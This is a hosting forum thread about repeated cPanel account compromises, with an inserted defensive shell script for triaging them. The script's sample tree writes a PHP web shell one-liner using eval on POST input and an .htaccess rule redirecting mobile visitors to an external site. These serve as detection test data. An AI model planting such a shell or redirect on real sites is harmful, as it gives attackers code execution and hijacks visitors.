
cPanel WHM server invasion

Comments

8 comments

  • cPRex Jurassic Moderator
    Hey there! It would likely be worth opening a ticket with our team, as any investigation without seeing the server is really just guessing. If the files and directories you are seeing created are owned by the cPanel user, that would indicate the compromise is at the user level, and not the root level of the server, so at least that is good news. This is often a problem caused by keylogging software on customer machines, as passwords get stolen when that user logs into cPanel and are sent to the hacker so they can access the account. If you submit a ticket to our team we can at least rule out common root compromises, and we also may be able to point you in the right direction as to what the original source of the compromise was.
    0
  • Quintanilha-RJ
    The problem is not just one server, but three servers, and not one specific user account, but several user accounts: files are being added and files are also being deleted from the end users. This is my concern. Could there be some command that I could use to check these invasions?
    0
  • cPRex Jurassic Moderator
    Sure, but it would still be best to look at one of the machines to see if we can determine a cause, as it's extremely unlikely to be related to the cPanel tools. It's also possible a tool such as WordPress has experienced a compromise, either through a plugin or through a tool like AnonymousFox:
    0
  • plesk4lyf
    Quintanilha-RJ, The firewall isn't going to help with exploits of this nature at all, because they're using the services to perform the exploits. It's most likely that website code/CMS/plugins are outdated and have holes that are able to be exploited. You should always keep the code up-to-date so security holes are patched. If it's shared hosting and you don't have that level of control over it, then I recommend looking at: There's no easy fix or silver bullet to prevent exploits on sites.
    0
  • Camilo Herrera
    They are using the cPanel user and password on each account to upload the files; check the last IPs that accessed the cPanel interface (.lastlogin file in the root folder). It may be a phishing attack and users just gave the password away to a malicious e-mail message. Enable 2FA on the accounts, change passwords and install malware protection software on your servers; CXS is the best regarding price/performance and features.
    0
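The checks raised in this thread, as an added example that is not code from the thread, from cPanel or from CXS: a POSIX shell script that (a) lists the distinct IPs in an account's `.lastlogin` file as Camilo suggests, (b) lists recently modified `.php`/`.html` files under `public_html` as a concrete answer to "some command I could use to check these invasions", (c) lists files not owned by the account user, which is the user-level versus root-level distinction the moderator describes, and (d) greps `.htaccess` for redirects to external URLs. It builds a constructed sample account (`alice`) in a temporary directory so it runs offline; the `.lastlogin` line format `<ip> # <timestamp>`, the sample file contents and the account name are assumptions, not taken from the thread.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel. It builds a constructed
# sample account under a temp dir so it runs offline; on a real server set
# HOME_ROOT=/home, drop the sample-tree section and loop over /home/*.
# Assumptions (not confirmed by the thread): each .lastlogin line reads
# "<ip> # <timestamp>", and an attacker holding the cPanel password leaves
# freshly written .php/.html files and .htaccess redirects under public_html,
# all owned by the account user rather than root.

HOME_ROOT="$(mktemp -d)"
trap 'rm -rf "$HOME_ROOT"' EXIT

# --- constructed sample tree (one account, "alice") ---------------------------
ACCT="$HOME_ROOT/alice"
mkdir -p "$ACCT/public_html/wp-content/uploads"
cat > "$ACCT/.lastlogin" <<'EOF'
203.0.113.7 # 2023-05-01 10:00:00 -0300
198.51.100.9 # 2023-05-02 11:30:00 -0300
203.0.113.7 # 2023-05-03 09:15:00 -0300
EOF
printf '<?php echo "site"; ?>\n' > "$ACCT/public_html/index.php"
# constructed stand-in for an uploaded web shell
printf '<?php @eval($_POST["x"]); ?>\n' > "$ACCT/public_html/wp-content/uploads/cache.php"
printf '<html>old page</html>\n' > "$ACCT/public_html/old.html"
touch -t 202001010000 "$ACCT/public_html/old.html"   # pretend it is untouched since 2020
cat > "$ACCT/public_html/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} android [NC]
RewriteRule ^(.*)$ http://example.net/landing [R=302,L]
EOF

# --- triage functions ----------------------------------------------------------

# Distinct IPs that logged in to the account's cPanel interface, most frequent
# first, printed as "<ip> <count>". $1 = account home directory.
lastlogin_ips() {
    awk '{ print $1 }' "$1/.lastlogin" | sort | uniq -c | sort -rn \
        | awk '{ print $2, $1 }'
}

# .php/.html files under public_html modified in the last $2 days; the ones
# the site owner did not put there are the injected pages. $1 = account home.
recent_web_files() {
    find "$1/public_html" -type f \( -name '*.php' -o -name '*.html' \) \
        -mtime "-$2" | sort
}

# Files under public_html NOT owned by the account user ($2). Anything listed
# here was written by another user or by root, which points past a stolen
# cPanel password to a server-level problem.
foreign_owned_files() {
    find "$1/public_html" -type f ! -user "$2"
}

# .htaccess RewriteRule lines that send visitors to an absolute external URL,
# the usual mechanism behind "the site sends users to another web address".
external_redirects() {
    find "$1/public_html" -name .htaccess \
        -exec grep -H -E 'RewriteRule[[:space:]].*https?://' {} \;
}

# --- run the triage on the sample account --------------------------------------
echo "== cPanel logins by IP =="; lastlogin_ips "$ACCT"
echo "== web files changed in the last 7 days =="; recent_web_files "$ACCT" 7
echo "== files not owned by $(id -un) =="; foreign_owned_files "$ACCT" "$(id -un)"
echo "== external redirects in .htaccess =="; external_redirects "$ACCT"
```

On a real server, compare the IPs from `lastlogin_ips` against the customer's known addresses before resetting passwords: a login from an unfamiliar country shortly before the injected files' mtimes is the phishing or keylogger case; an empty `recent_web_files` output with new files still appearing, or anything from `foreign_owned_files`, means the writes are not coming through the cPanel account and the server itself needs to be examined.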
  • Quintanilha-RJ
    I installed CXS on my server to avoid phishing attacks; although it has gone down a lot, I still have this problem on 3 cPanel servers. I've been thinking about changing the /home/usuario partition on my server, which would make the path non-standard and thus inhibit such virus action. If this is a solution, how do I apply it to change the /home/user partition, for example to /server/user? The problems I have are password changes, files with changed permissions and file inclusion in the cPanel panel to send the end user to another web address. I thank you for your help.
    0
  • cPRex Jurassic Moderator
    I don't think changing the path would help with this situation. The user content would just be moved to a different folder. It's probably best to work with a system administrator to help get this fixed with how long this has been happening.
    0
  • Quintanilha-RJ
    This has been happening for some time, but it is getting more complicated every day: servers being invaded with .php and .html files, thus leaving sites offline, and the biggest consequence is the datacenter sending abuse notifications and even the risk of shutting down my server!
    0
